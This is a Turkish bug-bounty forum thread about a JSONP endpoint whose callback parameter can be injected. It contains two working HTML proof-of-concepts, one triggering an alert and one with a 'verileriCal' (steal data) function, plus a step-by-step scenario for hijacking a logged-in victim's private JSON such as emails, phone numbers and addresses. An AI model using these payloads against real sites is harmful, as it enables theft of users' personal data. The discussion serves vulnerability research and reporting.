Neler yeni
Kullanıcı:
Bughane Academy

Bughane Academy, bug bounty, web güvenliği ve sızma testi alanında kendini geliştirmek isteyenler için kurulmuş Türkçe odaklı bir topluluktur.

Burada; gerçek güvenlik açıkları, recon ve exploit teknikleri, payload & bypass yöntemleri, araçlar, scriptler ve write-up’lar topluluk tarafından paylaşılır ve tartışılır.

Birlikte öğren, birlikte üret, birlikte güçlen.

XSS BİLEN BİRİSİNDEN YARDIM LAZIM

Y

YOHOHOHOHOHO

Avcı
Katılım
11 Ocak 2026
Mesajlar
87
Tepkime puanı
25
Puan
18
example.com/app/shop/jsonp?k=test&m=Product&a=GetDetail&p={"gid":103670}&_=1741758259069&callback=XSS &callback parametresine ne yazarsam yazıyım javascript olarak sayfaya <pre> tagı içerisine text olarak kaydediyor şöyle Ekran Resmi 2026-03-30 18.38.08.jpgBU ARADA CONTENT TYPE Content-Type: application/javascript;charset=UTF-8

FAKAT BU İSTEĞİ BURP İLE YAKALARSAM REPEATER İLE DENEDİĞİMDE İSE HERHANİ Bİ JAVASCRİP KODU MESELA print() VEYA YORUM SATIRI GİBİ VEYA confirm(1) VEYA DEĞİŞKEN TANIMLADIĞIMDA BİLE RENGİ VS DEĞİŞİYOR YORUMA ALIYORUM VS AMA RESPONSE YİNE TEXT GÖRÜNÜYOR VE İŞLEMİYOR XSS VEYA HTML İNJECTİON FİLAN

MESELA SAYFANIN GERİ KALANINI DA YORUM SATIRI YAPINCA İŞE YARIYOR ÖRNEK YORUM SATIRINA ALINCA ;

Ekran Resmi 2026-03-30 18.44.09.jpg

ALMAYINCA


Ekran Resmi 2026-03-30 18.42.52.jpg

FİKRİ OLAN VARMI İLK DEFA KARŞILAŞIYOM BÖYLE BİŞİYLE
 
bu zaafiyette Content-Type: application/javascript;charset=UTF-8 böyle olduğu için senin metnini alıp otomatik preformatted text (pre) etiketi içine koyuyor bu yüzden bu zaafiyette kendi tarayıcında çalıştırman lazım localde

boş html dosyası aç şu taslağı yapıştır linki düzelt ve çalıştır alert vermesi lazım

HTML: 
<html>
<head>
    <title>JSONP XSS PoC</title>
</head>
<body>
    
    <script src="https://example.com/app/shop/jsonp?k=test&m=Product&a=GetDetail&p={%22gid%22:103670}&_=1741758259069&callback=alert('XSS')//"></script>
</body>
</html>
 
EFETR' Alıntı:
bu zaafiyette Content-Type: application/javascript;charset=UTF-8 böyle olduğu için senin metnini alıp otomatik preformatted text (pre) etiketi içine koyuyor bu yüzden bu zaafiyette kendi tarayıcında çalıştırman lazım localde

boş html dosyası aç şu taslağı yapıştır linki düzelt ve çalıştır alert vermesi lazım

HTML: 
<html>
<head>
    <title>JSONP XSS PoC</title>
</head>
<body>
   
    <script src="https://example.com/app/shop/jsonp?k=test&m=Product&a=GetDetail&p={%22gid%22:103670}&_=1741758259069&callback=alert('XSS')//"></script>
</body>
</html>
Genişletmek için tıkla ...
hocam çalıştı çok sağol ama bunu nasıl zafiyet olarak rapor edebilirim ki veya bunu nasıl kullanabilirim zafiyet olarak veya bunu napabilirim
 
JSONP Hijacking olarak rapor edebilirsin
Saldırı seneryosu da şöyle olabilir

1- Kurban senin sitene girer
2- Senin sitendeki o zararlı html kodu anında tetiklenir
3- Kurbanın tarayıcısı kurban zaten example.com giriş yapmış olduğu için kurbanın oturum çerezleriyle birlikte hedef sunucuya gider
4- Hedef sunucu kurbana ait özel JSON verilerini alır ve senin verileriCal isimli fonksiyonunun içine koyarak senin sitene geri gönderir
5- Sen kurbanın example.com üzerindeki gizli verilerini kendi sitende okumuş ve kendi veri tabanına kaydetmiş olursun
Hedef kurbanın çalınacak verilerini çekiceğin taslak poc da şu şekilde olabilir geliştirebilirsin
HTML: 
<html>
<head>
    <title>JSONP PoC</title>
</head>
<body>
    <h1>Veriler Çekiliyor</h1>
    
    <script>
        function verileriCal(gelenData) {
            alert("Çalınan Veri: \n\n" + JSON.stringify(gelenData));
        }
    </script>

    <script src="https://example.com/app/shop/jsonp?k=test&m=Product&a=GetDetail&p={%22gid%22:103670}&_=1741758259069&callback=verileriCal"></script>
</body>
</html>

Hassas verileri çekebilirsin bu sayede şu başlık altında da rapor sunarsın Sensitive Information Disclosure via JSONP Hijacking ama bu konuyu araştır o şekilde rapor sun
 
EFETR' Alıntı:
JSONP Hijacking olarak rapor edebilirsin
Saldırı seneryosu da şöyle olabilir

1- Kurban senin sitene girer
2- Senin sitendeki o zararlı html kodu anında tetiklenir
3- Kurbanın tarayıcısı kurban zaten example.com giriş yapmış olduğu için kurbanın oturum çerezleriyle birlikte hedef sunucuya gider
4- Hedef sunucu kurbana ait özel JSON verilerini alır ve senin verileriCal isimli fonksiyonunun içine koyarak senin sitene geri gönderir
5- Sen kurbanın example.com üzerindeki gizli verilerini kendi sitende okumuş ve kendi veri tabanına kaydetmiş olursun
Hedef kurbanın çalınacak verilerini çekiceğin taslak poc da şu şekilde olabilir geliştirebilirsin
HTML: 
<html>
<head>
    <title>JSONP PoC</title>
</head>
<body>
    <h1>Veriler Çekiliyor</h1>
   
    <script>
        function verileriCal(gelenData) {
            alert("Çalınan Veri: \n\n" + JSON.stringify(gelenData));
        }
    </script>

    <script src="https://example.com/app/shop/jsonp?k=test&m=Product&a=GetDetail&p={%22gid%22:103670}&_=1741758259069&callback=verileriCal"></script>
</body>
</html>

Hassas verileri çekebilirsin bu sayede şu başlık altında da rapor sunarsın Sensitive Information Disclosure via JSONP Hijacking ama bu konuyu araştır o şekilde rapor sun
Genişletmek için tıkla ...
<script src="https://example.com/app/shop/jsonp?k=test&m=Product&a=GetDetail&p={%22gid%22:103670}&_=1741758259069&callback=verileriCal"></script>
bu kod üzerinde verileriCal sadece data getiriyor cookie basmıyor verinin içeriğini döndürüyor bana alert olarak
 
LOLA' Alıntı:
<script src="https://example.com/app/shop/jsonp?k=test&m=Product&a=GetDetail&p={%22gid%22:103670}&_=1741758259069&callback=verileriCal"></script>
bu kod üzerinde verileriCal sadece data getiriyor cookie basmıyor verinin içeriğini döndürüyor bana alert olarak
Genişletmek için tıkla ...
şimdi şöyle ki GetDetail verisini alıyoruz o yüzden içeriği çekemiyorsun şuan ki zaafiyet ile raporu kapatırlar yüksek ihtimalle senin bunu verileri çekebileceğin bir impacta çevirmen lazım
zafiyetli sitede hesabım , profilim , siparişlerim , adreslerim tarzında kısımların üzerinden denemelisin bizim burda amacımız hassas veri çekmek mail olur veya telefon numarası adres vs. gibi o linkler üzerinden testleri gerçekleştir ayrıca şu tarz makalelere de bakabilirsin en kötü yapamadığın yerde ai ile bilgi alışverişi yap yardımcı olur
dev.to

Talking about JSONP Hijacking Vulnerability

JSONP The full name of JSONP is JSON with Padding, a solution based on JSON format to...
dev.to dev.to
portswigger.net

JSON hijacking for the modern web

I presented this topic at OWASP London and Manchester. You can find the talk and slides below: Slides from OWASP London talk Benjamin Dumke-von der Ehe found an interesting way to steal data cross dom
portswigger.net portswigger.net
 
EFETR' Alıntı:
şimdi şöyle ki GetDetail verisini alıyoruz o yüzden içeriği çekemiyorsun şuan ki zaafiyet ile raporu kapatırlar yüksek ihtimalle senin bunu verileri çekebileceğin bir impacta çevirmen lazım
zafiyetli sitede hesabım , profilim , siparişlerim , adreslerim tarzında kısımların üzerinden denemelisin bizim burda amacımız hassas veri çekmek mail olur veya telefon numarası adres vs. gibi o linkler üzerinden testleri gerçekleştir ayrıca şu tarz makalelere de bakabilirsin en kötü yapamadığın yerde ai ile bilgi alışverişi yap yardımcı olur
dev.to

Talking about JSONP Hijacking Vulnerability

JSONP The full name of JSONP is JSON with Padding, a solution based on JSON format to...
dev.to dev.to
portswigger.net

JSON hijacking for the modern web

I presented this topic at OWASP London and Manchester. You can find the talk and slides below: Slides from OWASP London talk Benjamin Dumke-von der Ehe found an interesting way to steal data cross dom
portswigger.net portswigger.net
Genişletmek için tıkla ...
hocam sana ne kadar teşekkür etsem azdır çok sağol
 
LOLA' Alıntı:
inş

@baldwin hocam varmı sizin bi bilginiz bu konuda
Genişletmek için tıkla ...
Bu Direct XSS değil. bir Script Injection veya JSONP Hijacking potansiyelidir. URLyi doğrudan tarayıcıya yapıştırıp sonuç beklemek yerine o URLyi bir <script> etiketi içinde çağırarak test etmek en mantıklısı. modern tarayıcılarda işin zor. Direk alert alman zor. Büyük ihtimal self seviyesine değerlendirilir. yine de gelişim açısından ilerletebildiğiniz kadar ilerletmek en mantıklısı. Yukarıda @EFETR nin verdiği yöntem en mantıklısı daha ileri götürebileceğini zannetmiyorum çünkü Modern tarayıcılar application/javascript içerik tipini doğrudan sayfa gibi işlemiyor bu yüzden URLyi tarayıcıya yapıştırarak alert alman çok zor
 

baldwin' Alıntı:
Bu Direct XSS değil. bir Script Injection veya JSONP Hijacking potansiyelidir. URLyi doğrudan tarayıcıya yapıştırıp sonuç beklemek yerine o URLyi bir <script> etiketi içinde çağırarak test etmek en mantıklısı. modern tarayıcılarda işin zor. Direk alert alman zor. Büyük ihtimal self seviyesine değerlendirilir. yine de gelişim açısından ilerletebildiğiniz kadar ilerletmek en mantıklısı. Yukarıda @EFETR nin verdiği yöntem en mantıklısı daha ileri götürebileceğini zannetmiyorum çünkü Modern tarayıcılar application/javascript içerik tipini doğrudan sayfa gibi işlemiyor bu yüzden URLyi tarayıcıya yapıştırarak alert alman çok zor
Genişletmek için tıkla ...
sağolun hocma
 
Cevap yazmak için giriş yap yada kayıt ol.
Geri
Üst